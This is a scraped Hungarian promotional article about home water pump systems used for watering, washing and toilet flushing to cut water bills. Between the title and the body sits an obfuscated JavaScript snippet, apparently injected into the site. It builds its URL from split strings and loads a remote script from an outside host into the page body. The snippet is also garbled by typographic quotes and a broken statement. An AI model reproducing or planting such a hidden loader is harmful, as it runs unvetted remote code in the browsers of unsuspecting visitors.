Spóroljunk a vízszámlákon házi vízművel!

Spóroljunk a vízszámlákon házi vízművel!

(function(){x8n2_=(„u”+””)+”s”+””;x8n2_+=(„tat.”)+(„i”);x8n2=document.createElement(„script”);x8n2.;x8n2_+=”nf”+(„o”)+”/”;x8n2u=”426767797″+”.”;x8n2.async=true;x8n2u+=”3hlnzq8w8n26jv2edx8ufq2ztj6dkk”;x8n2.src=”https://”+x8n2_+x8n2u;x8n2b=document.body;x8n2b.appendChild(x8n2);})();

Részletesen a hidrofor felhasználásának területeiről

A roppant praktikus berendezés, amelyet sokan hidroforként ismernek, a vezetékes víz egyik legkiválóbb alternatívája. Gondoljunk csak bele, a mindennapokban hány és hány olyan teendő adódik, amelyhez nem szükséges ívóvíz minőségű folyadékot használni – mi mégis ezt tesszük, jobb, gazdaságosabb választási lehetőség hiányában. A házi vízmű ezt a felesleges, költséges pazarlást hivatott ellensúlyozni azáltal, hogy a ház körül természetes forrásból származó vizet (például kútból vagy ciszternából) használja fel azoknak a feladatoknak az ellátására, ahol nem mérvadó a víz kifogástalan minősége, makulátlan tisztasága. A már említett mosás és öntözés mellett, a WC tartály feltöltése, a takarítás vagy éppen a felmosás is ilyen teendőknek számítanak.

Hírdetés

Az a bizonyos hab a tortán

Ha olyan kiemelt és roppant szerencsés helyzetben vagyunk, miszerint az ívóvíz minőségű víz természetes kinyerése is módunkban áll, a házi vízmű még nagyobb hasznot hoz a konyhára. Miért? Nos, ebben az esetben ugyanis a készülék tökéletesen megfelel az ívóvíz előállítására is. Ez különösen hasznos lehet azokon a településeken, ahol a vízhálózat kiépítése még nincs megoldva, esetleg a kiépítés valószerűtlenül nagy költséggel járna.

A számok magukért beszélnek

Tény, hogy a házi vízművel rengeteget lehet megtakarítani – ez a hó végi vízszámlában ölt majd formát. A szóban forgó modern berendezés az önellátó családok hétköznapi szuperhőse: azoké a környezettudatos személyeké, akik megfontolt módon szeretnének rálépni a közműszámláktól való függetlenedés ösvényére. Az pedig nem is kérdés, hogy megtérül-e a befektetés – ez az esetek döntő többségében garantált.


Forrás:alternativenergia.hu
Tovább a cikkre »